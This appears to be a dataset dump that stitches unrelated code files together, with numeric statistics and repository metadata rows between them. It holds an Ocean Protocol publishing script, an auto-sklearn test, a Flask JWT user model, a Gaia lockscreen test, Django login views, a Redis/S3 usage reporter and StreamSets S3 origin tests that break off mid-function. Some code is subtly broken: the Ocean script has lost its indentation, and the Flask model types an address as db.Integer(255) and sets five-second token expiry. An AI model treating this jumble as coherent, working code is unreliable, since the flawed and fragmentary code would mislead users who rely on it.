logging.info("Publishing Audio to NILE network: {}".format(args.url))
logging.info("Will set price to {} OCEAN".format(args.price))
logging.info("Offering {} OCEAN reward".format(args.reward))
logging.info("Requesting {} processors".format(args.number_nodes))
logging.info("".format())
#%%
# Get the configuration file path for this environment
logging.info("Configuration file selected: {}".format(OCEAN_CONFIG_PATH))
# logging.critical("Deployment type: {}".format(manta_utils.config.get_deployment_type()))
logging.info("Squid API version: {}".format(squid_py.__version__))
#%%
# Instantiate Ocean with the default configuration file.
configuration = Config(OCEAN_CONFIG_PATH)
squid_py.ConfigProvider.set_config(configuration)
ocn = Ocean(configuration)
#%%
# Get a publisher account
publisher_acct = manta_utils.user.get_account_by_index(ocn,0)
#%%
logging.info("Publisher account address: {}".format(publisher_acct.address))
logging.info("Publisher account Testnet 'ETH' balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).eth/10**18))
logging.info("Publisher account Testnet Ocean balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).ocn/10**18))
def publish(url, price, reward, number_nodes):
# metadata = squid_py.ddo.metadata.Metadata.get_example()
# print('Name of asset:', metadata['base']['name'])
with open(JSON_TEMPLATE, 'r') as f:
metadata = json.load(f)
metadata['base']['files'][0]['url'] = url
metadata['base']['price'] = str(price)
metadata['additionalInformation']['reward'] = str(reward)
metadata['additionalInformation']['numberNodes'] = str(number_nodes)
ddo = ocn.assets.create(metadata, publisher_acct)
registered_did = ddo.did
logging.info("New asset registered at {}".format(str(registered_did)))
logging.info("Asset name: {}".format(metadata['base']['name']))
logging.info("Encrypted files to secret store, cipher text: [{}...] . ".format(ddo.metadata['base']['encryptedFiles'][:50]))
return registered_did
registered_did = publish(args.url, args.price, args.reward, args.number_nodes)
#TODO: Better handling based on reciept
print("Wait for the transaction to complete!")
sleep(10)
# %%
ddo = ocn.assets.resolve(registered_did)
# print("Asset '{}' resolved from Aquarius metadata storage: {}".format(ddo.did,ddo.metadata['base']['name']))
# %% [markdown]
# Similarly, we can verify that this asset is registered into the blockchain, and that you are the owner.
# %%
# We need the pure ID string as in the DID registry (a DID without the prefixes)
asset_id = squid_py.did.did_to_id(registered_did)
owner = ocn._keeper.did_registry.contract_concise.getDIDOwner(asset_id)
# print("Asset ID", asset_id, "owned by", owner)
assert str.lower(owner) == str.lower(publisher_acct.address)
logging.info("".format())
logging.info("Successfully registered Audio!".format())
logging.info("Asset Owner: {}".format(owner))
logging.info("Asset DID: {}".format(registered_did))
| 36.986755
| 128
| 0.708684
| 721
| 5,585
| 5.363384
| 0.306519
| 0.06827
| 0.039566
| 0.024825
| 0.138092
| 0.088699
| 0.049651
| 0.049651
| 0.03129
| 0
| 0
| 0.012566
| 0.116562
| 5,585
| 150
| 129
| 37.233333
| 0.77118
| 0.253715
| 0
| 0.067568
| 0
| 0
| 0.315175
| 0.062014
| 0
| 0
| 0.010214
| 0.006667
| 0.054054
| 1
| 0.013514
| false
| 0.054054
| 0.175676
| 0
| 0.202703
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7c70c6e774d6a8ca53417d3cc9999e257be28aad
| 1,093
|
py
|
Python
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1
|
2021-02-21T16:44:44.000Z
|
2021-02-21T16:44:44.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 9
|
2021-02-12T17:52:34.000Z
|
2021-06-26T11:37:41.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1
|
2021-07-06T23:02:42.000Z
|
2021-07-06T23:02:42.000Z
|
import sklearn.linear_model
from autosklearn.pipeline.components.classification.passive_aggressive import \
PassiveAggressive
from .test_base import BaseClassificationComponentTest
class PassiveAggressiveComponentTest(BaseClassificationComponentTest):
__test__ = True
res = dict()
res["default_iris"] = 0.92
res["iris_n_calls"] = 5
res["default_iris_iterative"] = 0.92
res["iris_iterative_n_iter"] = 32
res["default_iris_proba"] = 0.29271032477461295
res["default_iris_sparse"] = 0.4
res["default_digits"] = 0.9156041287188829
res["digits_n_calls"] = 6
res["default_digits_iterative"] = 0.9156041287188829
res["digits_iterative_n_iter"] = 64
res["default_digits_binary"] = 0.9927140255009107
res["default_digits_multilabel"] = 0.90997912489192
res["default_digits_multilabel_proba"] = 1.0
res['ignore_hps'] = ['max_iter']
sk_mod = sklearn.linear_model.PassiveAggressiveClassifier
module = PassiveAggressive
step_hyperparameter = {
'name': 'max_iter',
'value': module.get_max_iter(),
}
| 30.361111
| 79
| 0.725526
| 123
| 1,093
| 6.105691
| 0.447154
| 0.11984
| 0.106525
| 0.026631
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10989
| 0.167429
| 1,093
| 35
| 80
| 31.228571
| 0.715385
| 0
| 0
| 0
| 0
| 0
| 0.26624
| 0.15279
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.185185
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7c9666a6d0704c6c5a1d15ed10e9ce79d7670676
| 3,215
|
py
|
Python
|
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
# project/server/models.py
import jwt
import datetime
from project.server import app, db, bcrypt
class User(db.Model):
""" User Model for storing user related details """
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(255), unique=True, nullable=False)
email = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
name = db.Column(db.String(255), nullable=False)
age = db.Column(db.Integer, nullable=False)
address = db.Column(db.Integer(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False)
admin = db.Column(db.Boolean, nullable=False, default=False)
def __init__(self, email, username, password, name, age, address, admin=False):
self.email = email
self.username = username
self.password = bcrypt.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode()
self.name = name
self.age = age
self.address = address
self.registered_on = datetime.datetime.now()
self.admin = admin
def encode_auth_token(self, user_id):
"""
Generates the Auth Token
:return: string
"""
try:
payload = {
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=0, seconds=5),
'iat': datetime.datetime.utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
"""
Validates the auth token
:param auth_token:
:return: integer|string
"""
try:
payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class BlacklistToken(db.Model):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
# Check whether auth token has been blacklisted
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False
| 32.806122
| 90
| 0.612753
| 368
| 3,215
| 5.211957
| 0.296196
| 0.050052
| 0.062565
| 0.04171
| 0.18561
| 0.163712
| 0.163712
| 0.095933
| 0.095933
| 0.052138
| 0
| 0.009961
| 0.281804
| 3,215
| 97
| 91
| 33.14433
| 0.820702
| 0.080871
| 0
| 0.115942
| 0
| 0
| 0.07058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0.057971
| 0.043478
| 0.014493
| 0.492754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7caf56de8045038d74971a889dbed39c31d7bb50
| 1,306
|
py
|
Python
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
BReduardokramer/gaia
|
c00302cdcd435ab193e8365917cfc6abac9e4f2e
|
[
"Apache-2.0"
] | 1
|
2021-11-09T00:27:34.000Z
|
2021-11-09T00:27:34.000Z
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from gaiatest import GaiaTestCase
from gaiatest.apps.lockscreen.app import LockScreen
class TestCameraUnlockWithPasscode(GaiaTestCase):
# Input data
_input_passcode = '7931'
def setUp(self):
GaiaTestCase.setUp(self)
# Turn off geolocation prompt
self.apps.set_permission('System', 'geolocation', 'deny')
self.data_layer.set_setting('lockscreen.passcode-lock.code', self._input_passcode)
self.data_layer.set_setting('lockscreen.passcode-lock.enabled', True)
# this time we need it locked!
self.lockscreen.lock()
self.lock_screen = LockScreen(self.marionette)
def test_unlock_to_camera_with_passcode(self):
# https://github.com/mozilla/gaia-ui-tests/issues/479
camera = self.lock_screen.unlock_to_camera()
self.lock_screen.wait_for_lockscreen_not_visible()
camera.switch_to_camera_frame()
self.assertFalse(camera.is_gallery_button_visible)
camera.tap_switch_source()
camera.wait_for_capture_ready()
self.assertFalse(camera.is_gallery_button_visible)
| 31.095238
| 90
| 0.717458
| 173
| 1,306
| 5.202312
| 0.520231
| 0.026667
| 0.046667
| 0.035556
| 0.195556
| 0.195556
| 0.195556
| 0.1
| 0
| 0
| 0
| 0.010427
| 0.19219
| 1,306
| 41
| 91
| 31.853659
| 0.842654
| 0.238897
| 0
| 0.105263
| 0
| 0
| 0.087221
| 0.061866
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.105263
| false
| 0.263158
| 0.105263
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7cb2d3d2cb22c43c3c911d744e22c33bc37cdf49
| 1,661
|
py
|
Python
|
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, render_to_response, redirect
from django.contrib import auth
from django.contrib.auth.forms import UserCreationForm
from django.template.context_processors import csrf
from django.http import HttpResponseRedirect
def login(request):
args = {}
args.update(csrf(request))
if request.POST:
username = request.POST.get('username')
password = request.POST.get('password')
user = auth.authenticate(username=username, password=password)
if user is not None:
auth.login(request, user)
return redirect('/main')
else:
args['login_error'] = "Пользователь не найден или пароль введен неверный пароль"
return render_to_response('login.html', args)
else:
return render_to_response('login.html', args)
def reg(request):
auth.logout(request)
error = ''
if request.method == "POST":
newuser_form = UserCreationForm(data = request.POST)
if newuser_form.is_valid():
newuser_form.save()
newuser = auth.authenticate(username = newuser_form.cleaned_data['username'], password = newuser_form.cleaned_data['password1'])
auth.login(request, newuser)
return redirect('/main')
else:
error = 'Проверьте правильность вводимых данных.'
else:
newuser_form = UserCreationForm()
return render(request, 'reg.html', locals() )
def main(request):
return render(request, 'index.html', {'username': auth.get_user(request).username} )
def logout(request):
auth.logout(request)
return HttpResponseRedirect("/login")
| 31.339623
| 140
| 0.668874
| 186
| 1,661
| 5.876344
| 0.327957
| 0.060384
| 0.043916
| 0.040256
| 0.064044
| 0.064044
| 0.064044
| 0
| 0
| 0
| 0
| 0.000777
| 0.225166
| 1,661
| 52
| 141
| 31.942308
| 0.848485
| 0
| 0
| 0.25
| 0
| 0
| 0.123494
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0.075
| 0.125
| 0.025
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7cda6328ac58b61f05923cca8623aa6b42f94561
| 3,591
|
py
|
Python
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 13
|
2016-10-07T20:25:11.000Z
|
2022-02-23T06:33:59.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 427
|
2016-08-17T18:03:32.000Z
|
2022-03-31T10:46:12.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 5
|
2017-04-25T21:13:03.000Z
|
2018-01-23T00:21:06.000Z
|
import requests
import redis
import json
import ast
import sys
import time
import urllib
import re
import sys
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
import argparse
def get_options():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--sentinel-ip", default='127.0.0.1', help="Sentinel IP")
parser.add_argument("-p", "--sentinel-port", default="16379", help="Sentinel Port")
parser.add_argument("-v", "--redis-password", default=None, help="Redis AUTH Password")
parser.add_argument("-n", "--sentinel-cluster-name", default='scality-s3', help="Redis cluster name")
parser.add_argument("-b", "--bucketd-addr", default='http://127.0.0.1:9000', help="URL of the bucketd server")
return parser.parse_args()
def safe_print(content):
print("{0}".format(content))
class askRedis():
def __init__(self, ip="127.0.0.1", port="16379", sentinel_cluster_name="scality-s3", password=None):
self._password = password
r = redis.Redis(host=ip, port=port, db=0, password=password)
self._ip, self._port = r.sentinel_get_master_addr_by_name(sentinel_cluster_name)
def read(self, resource, name):
r = redis.Redis(host=self._ip, port=self._port, db=0, password=self._password)
res = 's3:%s:%s:storageUtilized:counter' % (resource, name)
total_size = r.get(res)
res = 's3:%s:%s:numberOfObjects:counter' % (resource, name)
files = r.get(res)
try:
return {'files': int(files), "total_size": int(total_size)}
except Exception as e:
return {'files': 0, "total_size": 0}
class S3ListBuckets():
def __init__(self, host='127.0.0.1:9000'):
self.bucketd_host = host
def run(self):
docs = []
url = "%s/default/bucket/users..bucket" % self.bucketd_host
session = requests.Session()
r = session.get(url, timeout=30)
if r.status_code == 200:
payload = json.loads(r.text)
for keys in payload['Contents']:
key = keys["key"]
r1 = re.match("(\w+)..\|..(\w+.*)", key)
docs.append(r1.groups())
return docs
return(self.userid, self.bucket, user, files, total_size)
if __name__ == '__main__':
options = get_options()
redis_conf = dict(
ip=options.sentinel_ip,
port=options.sentinel_port,
sentinel_cluster_name=options.sentinel_cluster_name,
password=options.redis_password
)
P = S3ListBuckets(options.bucketd_addr)
listbuckets = P.run()
userids = set([x for x, y in listbuckets])
executor = ThreadPoolExecutor(max_workers=1)
for userid, bucket in listbuckets:
U = askRedis(**redis_conf)
data = U.read('buckets', bucket)
content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, bucket, data["files"], data["total_size"])
executor.submit(safe_print, content)
data = U.read('buckets', 'mpuShadowBucket'+bucket)
content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, 'mpuShadowBucket'+bucket, data["files"], data["total_size"])
executor.submit(safe_print, content)
executor.submit(safe_print, "")
for userid in sorted(userids):
U = askRedis(**redis_conf)
data = U.read('accounts', userid)
content = "Account:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, data["files"], data["total_size"])
executor.submit(safe_print, content)
| 35.554455
| 114
| 0.634085
| 452
| 3,591
| 4.889381
| 0.292035
| 0.032579
| 0.038462
| 0.01086
| 0.184163
| 0.175113
| 0.158371
| 0.133937
| 0.133937
| 0.133937
| 0
| 0.021708
| 0.217488
| 3,591
| 101
| 115
| 35.554455
| 0.764769
| 0
| 0
| 0.109756
| 0
| 0
| 0.190145
| 0.076837
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0.073171
| 0.146341
| 0
| 0.292683
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7cfaab0b77af0b6c7c138ff09a0a82244c391f57
| 12,133
|
py
|
Python
|
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | null | null | null |
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | null | null | null |
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | 1
|
2019-10-29T08:46:11.000Z
|
2019-10-29T08:46:11.000Z
|
import logging
import pytest
from streamsets.testframework.markers import aws, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)
S3_SANDBOX_PREFIX = 'sandbox'
LOG_FIELD_MAPPING = [{'fieldPath': '/date', 'group': 1},
{'fieldPath': '/time', 'group': 2},
{'fieldPath': '/timehalf', 'group': 3},
{'fieldPath': '/info', 'group': 4},
{'fieldPath': '/file', 'group': 5},
{'fieldPath': '/message', 'group': 6}]
REGULAR_EXPRESSION = r'(\S+) (\S+) (\S+) (\S+) (\S+) (.*)'
# log to be written int the file on s3
data_format_content = {
'COMMON_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] '
'"GET /apache.gif HTTP/1.0" 200 232',
'LOG4J': '200 [main] DEBUG org.StreamSets.Log4j unknown - This is sample log message',
'APACHE_ERROR_LOG_FORMAT': '[Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client '
'denied by server configuration:/export/home/live/ap/htdocs/test',
'COMBINED_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache.gif'
' HTTP/1.0" 200 2326 "http://www.example.com/strt.html" "Mozilla/4.08'
' [en] (Win98; I ;Nav)"',
'APACHE_CUSTOM_LOG_FORMAT': '10.185.248.71 - - [09/Jan/2015:9:12:06 +0000] "GET '
'/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 '
'HTTP/1.1" 500 17 ',
'CEF': '10.217.31.247 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=10.217.253.78 '
'spt=53743 method=GET request=http://vpx247.example.net/FFC/login.html msg=Disallow Illegal URL.',
'LEEF': 'LEEF: 2.0|Trend Micro|Deep Security Agent|<DSA version>|4000030|cat=Anti-Malware '
'name=HEU_AEGIS_CRYPT desc=HEU_AEGIS_CRYPT sev=6 cn1=241 msg=Realtime',
'REGEX': '2019-04-30 08:23:53 AM [INFO] [streamsets.sdk.sdc_api] Pipeline Filewriterpipeline53'}
# data to verify the output of amazon s3 origin.
get_data_to_verify_output = {
'LOG4J': {'severity': 'DEBUG', 'relativetime': '200', 'thread': 'main', 'category': 'org.StreamSets.Log4j',
'ndc': 'unknown', 'message': 'This is sample log message'},
'COMMON_LOG_FORMAT': {'request': '/apache.gif', 'auth': 'frank', 'ident': '-', 'response': '200', 'bytes':
'232', 'clientip': '127.0.0.1', 'verb': 'GET', 'httpversion': '1.0', 'rawrequest': None,
'timestamp': '10/Oct/2000:13:55:36 -0700'},
'APACHE_ERROR_LOG_FORMAT': {'message': 'client denied by server configuration:/export/home/live/ap/htdocs/'
'test', 'timestamp': 'Wed Oct 11 14:32:52 2000', 'loglevel': 'error',
'clientip': '127.0.0.1'},
'COMBINED_LOG_FORMAT': {'request': '/apache.gif', 'agent': '"Mozilla/4.08 [en] (Win98; I ;Nav)"', 'auth':
'frank', 'ident': '-', 'verb': 'GET', 'referrer': '"http://www.example.com/strt.'
'html"', 'response': '200', 'bytes': '2326', 'clientip': '127.0.0.1',
'httpversion': '1.0', 'rawrequest': None, 'timestamp': '10/Oct/2000:13:55:36 -0700'},
'APACHE_CUSTOM_LOG_FORMAT': {'remoteUser': '-', 'requestTime': '09/Jan/2015:9:12:06 +0000', 'request': 'GET '
'/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 HTTP/1.1',
'logName': '-', 'remoteHost': '10.185.248.71', 'bytesSent': '17', 'status': '500'},
'CEF': {'severity': '6', 'product': 'NetScaler', 'extensions': {'msg': 'Disallow Illegal URL.', 'request':
'http://vpx247.example.net/FFC/login.html', 'method': 'GET', 'src': '10.217.253.78', 'spt': '53743'},
'signature': 'APPFW', 'vendor': 'Citrix', 'cefVersion': 0, 'name': 'APPFW_STARTURL',
'version': 'NS10.0'},
'GROK': {'request': '/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300', 'auth': '-',
'ident': '-', 'response': '500', 'bytes': '17', 'clientip': '10.185.248.71', 'verb': 'GET',
'httpversion': '1.1', 'rawrequest': None, 'timestamp': '09/Jan/2015:9:12:06 +0000'},
'LEEF': {'eventId': '4000030', 'product': 'Deep Security Agent', 'extensions': {'cat': 'Realtime'},
'leefVersion': 2.0, 'vendor': 'Trend Micro', 'version': '<DSA version>'},
'REGEX': {'/time': '08:23:53', '/date': '2019-04-30', '/timehalf': 'AM',
'/info': '[INFO]', '/message': 'Pipeline Filewriterpipeline53', '/file': '[streamsets.sdk.sdc_api]'}}
@pytest.mark.skip('Not yet implemented')
def test_configuration_access_key_id(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_bucket(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_connection_timeout(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('task', ['CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_content(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.parametrize('delete_original_object', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_delete_original_object(sdc_builder, sdc_executor, task, delete_original_object):
pass
@pytest.mark.parametrize('region', ['OTHER'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_endpoint(sdc_builder, sdc_executor, region):
pass
@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_new_object_path(sdc_builder, sdc_executor, task):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_object(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('on_record_error', ['DISCARD', 'STOP_PIPELINE', 'TO_ERROR'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_on_record_error(sdc_builder, sdc_executor, on_record_error):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_preconditions(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_host(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_password(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_port(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_user(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('region', ['AP_NORTHEAST_1', 'AP_NORTHEAST_2', 'AP_NORTHEAST_3', 'AP_SOUTHEAST_1', 'AP_SOUTHEAST_2', 'AP_SOUTH_1', 'CA_CENTRAL_1', 'CN_NORTHWEST_1', 'CN_NORTH_1', 'EU_CENTRAL_1', 'EU_WEST_1', 'EU_WEST_2', 'EU_WEST_3', 'OTHER', 'SA_EAST_1', 'US_EAST_1', 'US_EAST_2', 'US_GOV_WEST_1', 'US_WEST_1', 'US_WEST_2'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_region(sdc_builder, sdc_executor, region):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_required_fields(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_retry_count(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_secret_access_key(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_socket_timeout(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_tags(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT', 'COPY_OBJECT', 'CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_task(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('use_proxy', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_use_proxy(sdc_builder, sdc_executor, use_proxy):
pass
@aws('s3')
@pytest.mark.parametrize('data_format', ['LOG'])
@pytest.mark.parametrize('log_format', ['COMMON_LOG_FORMAT', 'APACHE_ERROR_LOG_FORMAT', 'COMBINED_LOG_FORMAT',
'APACHE_CUSTOM_LOG_FORMAT', 'REGEX', 'GROK', 'LOG4J', 'CEF', 'LEEF'])
def test_configurations_data_format_log(sdc_executor, sdc_builder, aws, data_format, log_format):
"""Check whether S3 origin can parse different log format or not. A log file is being created in s3 bucket
mentioned below .S3 origin reads the log file and parse the same.
Pipeline for the same-
s3_origin >> trash
s3_origin >= pipeline_finisher_executor
"""
if log_format == 'GROK':
file_content = data_format_content['APACHE_CUSTOM_LOG_FORMAT']
else:
file_content = data_format_content[log_format]
client = aws.s3
s3_key = f'{S3_SANDBOX_PREFIX}/{get_random_string()}'
attributes = {'bucket': aws.s3_bucket_name,
'prefix_pattern': f'{s3_key}/*',
'number_of_threads': 1,
'read_order': 'LEXICOGRAPHICAL',
'data_format': data_format,
'log_format': log_format,
'custom_log_format': '%h %l %u [%t] "%r" %>s %b',
'regular_expression': REGULAR_EXPRESSION,
'field_path_to_regex_group_mapping': LOG_FIELD_MAPPING
}
pipeline = get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws)
s3_origin = pipeline.origin_stage
try:
client.put_object(Bucket=aws.s3_bucket_name, Key=f'{s3_key}/{get_random_string()}.log', Body=file_content)
output_records = execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline)
assert output_records[0].field == get_data_to_verify_output[log_format]
finally:
if sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING':
sdc_executor.stop_pipeline(pipeline)
# cleaning up s3 bucket
delete_aws_objects(client, aws, s3_key)
def get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws):
# Build pipeline.
builder = sdc_builder.get_pipeline_builder()
builder.add_error_stage('Discard')
s3_origin = builder.add_stage('Amazon S3', type='origin')
s3_origin.set_attributes(**attributes)
trash = builder.add_stage('Trash')
pipeline_finisher_executor = builder.add_stage('Pipeline Finisher Executor')
